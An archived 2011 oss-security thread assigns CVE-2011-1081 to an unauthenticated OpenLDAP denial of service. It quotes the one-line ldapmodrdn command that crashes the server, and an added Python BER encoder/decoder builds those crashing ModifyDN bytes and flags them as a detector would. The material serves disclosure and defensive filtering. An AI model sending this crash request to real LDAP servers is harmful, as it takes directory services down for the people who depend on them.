Date: Tue, 1 Mar 2011 16:13:42 -0500 (EST)
From: Josh Bressers <bressers@...hat.com>
To: Thomas Biege <thomas@...e.de>
Cc: "Steven M. Christey" <coley@...us.mitre.org>,
        oss-security@...ts.openwall.com
Subject: Re: CVE Request -- OpenLDAP -- two issues

Please use CVE-2011-1081 for this new DoS.

Thanks.

-- 
    JB


----- Original Message -----
> The following might also need a CVE-ID.
> 
> https://bugzilla.novell.com/show_bug.cgi?id=674985#c1
> ------------------------------------------------------------------------------
> http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6768
> 
> That's a pretty bad DoS. Everybody (even unauthenticated users) can kill the
> server by submitting a MODRDN request with an empty "olddn" value and "remove
> old RDN" set (-r). Example:
> 
> ldapmodrdn -x -H ldap://ldapserver -r '' o=test
> ------------------------------------------------------------------------------
> 
> 
> On Friday, 25 February 2011 at 17:18:08, Josh Bressers wrote:
> > ----- Original Message -----
> > > Hello Josh, Steve, vendors,
> > >
> > > looks like the following two issues did not get CVE identifiers
> > > yet:
> > > [1] http://secunia.com/advisories/43331/
> >
> > The above advisory covers both bugs below.
> >
> >
> > > [2] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6607
> >
> > CVE-2011-1024 openldap forwarded bind failure messages cause success
> >
> >
> > > [3] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6661
> >
> > CVE-2011-1025 openldap rootpw is not verified with slapd.conf
> >
> >
> > Thanks.
> >
> >
> 
> --
> Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
> SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
> Whoever stops wanting to become better has stopped being good.
> -- Marie von Ebner-Eschenbach
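The ModifyDN request described in the quoted report, shown at the protocol level as an added example; this is not code from the thread or from OpenLDAP. The block is a small BER encoder/decoder for the LDAP ModifyDNRequest (RFC 4511, section 4.9): it builds the operation that the quoted `ldapmodrdn -x -H ldap://ldapserver -r '' o=test` command sends (empty `entry` DN, newrdn `o=test`, deleteoldrdn TRUE) and decodes incoming messages to flag any ModifyDN with an empty entry DN, the shape a protocol-aware filter or IDS rule would look for. The sample bytes are constructed here, the message ID is an assumption, and all function names (`encode_moddn_request`, `decode_moddn_request`, `is_empty_entry_moddn`) are this example's own.

```python
"""BER encoder/decoder for the LDAP ModifyDNRequest (RFC 4511, section 4.9).

Added example, not code from the thread or from OpenLDAP.  It shows what the
ldapmodrdn invocation quoted above puts on the wire for the ModifyDN
operation (empty `entry` DN, newrdn "o=test", deleteoldrdn TRUE) and a
decoder that flags such a request.  Sample bytes are constructed here; the
message ID is an assumption.
"""
from typing import Optional


def _ber_len(n: int) -> bytes:
    """Definite-form BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    """One BER tag-length-value element."""
    return bytes([tag]) + _ber_len(len(value)) + value


def _ber_int(n: int) -> bytes:
    """BER INTEGER with minimal two's-complement content octets."""
    return _tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))


def encode_moddn_request(message_id: int, entry: str, newrdn: str,
                         deleteoldrdn: bool,
                         new_superior: Optional[str] = None) -> bytes:
    """LDAPMessage { messageID, protocolOp = ModifyDNRequest } as BER.

    ModifyDNRequest ::= [APPLICATION 12] SEQUENCE {
        entry LDAPDN, newrdn RelativeLDAPDN, deleteoldrdn BOOLEAN,
        newSuperior [0] LDAPDN OPTIONAL }
    """
    body = (_tlv(0x04, entry.encode()) +                       # entry
            _tlv(0x04, newrdn.encode()) +                      # newrdn
            _tlv(0x01, b"\xff" if deleteoldrdn else b"\x00"))  # deleteoldrdn
    if new_superior is not None:
        body += _tlv(0x80, new_superior.encode())              # [0] newSuperior
    # 0x6c = APPLICATION class, constructed, tag number 12
    return _tlv(0x30, _ber_int(message_id) + _tlv(0x6c, body))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, content, position after the element) for the TLV at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def decode_moddn_request(msg: bytes) -> Optional[dict]:
    """Parse one LDAPMessage; return the ModifyDNRequest fields, or None if
    the protocolOp is some other operation."""
    tag, seq, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = _read_tlv(seq, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = _read_tlv(seq, pos)
    if tag != 0x6c:
        return None
    _, entry, pos = _read_tlv(op, 0)
    _, newrdn, pos = _read_tlv(op, pos)
    _, flag, pos = _read_tlv(op, pos)
    req = {"message_id": int.from_bytes(mid, "big", signed=True),
           "entry": entry.decode(), "newrdn": newrdn.decode(),
           "deleteoldrdn": flag != b"\x00"}
    if pos < len(op):                        # optional [0] newSuperior present
        tag, sup, _ = _read_tlv(op, pos)
        if tag == 0x80:
            req["new_superior"] = sup.decode()
    return req


def is_empty_entry_moddn(msg: bytes) -> bool:
    """True for a ModifyDNRequest whose entry DN is empty: the request shape
    the report above says kills an unpatched server."""
    req = decode_moddn_request(msg)
    return req is not None and req["entry"] == ""


# Constructed sample: the ModifyDN operation behind
#   ldapmodrdn -x -H ldap://ldapserver -r '' o=test
# (olddn '' -> entry "", newrdn "o=test", -r -> deleteoldrdn TRUE).
# Message ID 2 assumes the tool's preceding anonymous bind used ID 1.
CRASHER = encode_moddn_request(2, "", "o=test", True)
BENIGN = encode_moddn_request(2, "cn=old,dc=example,dc=com", "cn=new", True)

if __name__ == "__main__":
    print(CRASHER.hex())                     # 30120201026c0d040004066f3d746573740101ff
    print(decode_moddn_request(CRASHER))
    print(is_empty_entry_moddn(CRASHER), is_empty_entry_moddn(BENIGN))
```

The decoder deliberately returns `None` for any protocolOp other than ModifyDN, so it can be run over every LDAPMessage on a connection and only the flagged requests need further handling; the encoder is there to make the wire form of the report's command concrete, not to add anything beyond what the report already shows.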
